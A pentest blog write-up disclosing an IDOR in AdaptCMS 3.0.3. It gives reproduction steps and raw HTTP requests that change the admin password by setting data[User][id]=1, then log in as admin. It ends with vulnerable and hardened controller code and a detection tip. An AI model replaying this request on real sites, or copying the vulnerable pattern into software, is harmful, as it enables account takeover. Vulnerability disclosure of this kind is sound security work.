Sunday, 22 June 2025

Friday Fun Pentest Series - 28 - IDOR "Change Password" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to IDOR via the password change functionality, resulting in a low-privilege user being able to change the "admin" password


IDOR "Change Password" Functionality #1:

Steps to Reproduce:
  1. Log in as a user with low privilege and visit the profile page
  2. Select "Edit Your Profile" and click "Submit"
  3. Trap the HTTP POST request
  4. Set the "data[User][password]" and "data[User][password_confirm]" values to "Passw0rd!"
  5. Set the "data[User][id]" value to "1"
  6. This changes the password of the "admin" account

// HTTP POST request changing password

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]

[...]
4d63437ebea6a2ef6648b29cc1c43ea70600295a
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][password]"

Passw0rd!
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][password_confirm]"

Passw0rd!
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][email]"

privesc-test@test.test
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][id]"

1
------WebKitFormBoundaryDvhxmc78yz9KfFbn
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 19:56:17 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 13925
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


// HTTP POST request logging in with admin account

POST /adaptcms/login HTTP/1.1
Host: 192.168.58.131
Content-Length: 262
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Origin: http://192.168.58.131
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]

_method=POST&data[_Token][key]=dc18f92e4d0b810c603f45f2189b220de543a972&data[User][username]=admin&data[User][password]=Passw0rd!&data[_Token][fields]=5ba74a784fe0258a12c30194ef6a09b97a86bb1d%3A&data[_Token][unlocked]=


// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 19:56:33 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Set-Cookie: adaptcms=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: adaptcms=2aaosqqksob20a98viieaq8j44; expires=Mon, 02-Jun-2025 19:56:33 GMT; Max-Age=259200; path=/; HttpOnly
Location: http://192.168.58.131/adaptcms/admin
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
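The root cause shown in steps 4-5 is that the record id (data[User][id]) is taken from the client instead of the session. As an added illustration (not AdaptCMS's own code), below is a hypothetical CakePHP 2-style edit action in its vulnerable form beside a hardened form; the framework is assumed from the data[User][...] field naming, and the current_password field is a hypothetical addition.

```php
<?php
// Added example, not AdaptCMS's code: a hypothetical CakePHP 2-style
// UsersController showing the IDOR / mass-assignment pattern and a fix.
class UsersController extends AppController {

    // Vulnerable pattern: Model::save() honours data['User']['id'] from the
    // request, so any authenticated user can overwrite another account.
    public function edit_vulnerable() {
        if ($this->request->is('post')) {
            if ($this->User->save($this->request->data)) {
                $this->Session->setFlash('Profile updated');
                return $this->redirect(array('action' => 'profile'));
            }
        }
    }

    // Hardened pattern: the target id comes only from the authenticated
    // session, the client-supplied id is discarded, writable fields are
    // whitelisted, and a password change requires the current password.
    public function edit() {
        if ($this->request->is('post')) {
            $data = $this->request->data;
            unset($data['User']['id']);                // never trust client id
            $this->User->id = $this->Auth->user('id'); // bind to logged-in user

            if (!empty($data['User']['password'])) {
                // current_password is a hypothetical extra form field
                $supplied = isset($data['User']['current_password'])
                    ? $data['User']['current_password'] : '';
                $stored = $this->User->field('password');
                // Assumes the default AuthComponent hasher is used for login;
                // the comparison must use the same hasher as authentication.
                if (AuthComponent::password($supplied) !== $stored) {
                    $this->Session->setFlash('Current password is incorrect');
                    return;
                }
                if ($data['User']['password'] !== $data['User']['password_confirm']) {
                    $this->Session->setFlash('Passwords do not match');
                    return;
                }
            }
            $allowed = array('email', 'password'); // explicit field whitelist
            if ($this->User->save($data, true, $allowed)) {
                $this->Session->setFlash('Profile updated');
                return $this->redirect(array('action' => 'profile'));
            }
        }
    }
}
```

For detection, a password change whose data[User][id] differs from the session user's id is the event to log and alert on, independent of whether the fix is deployed.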

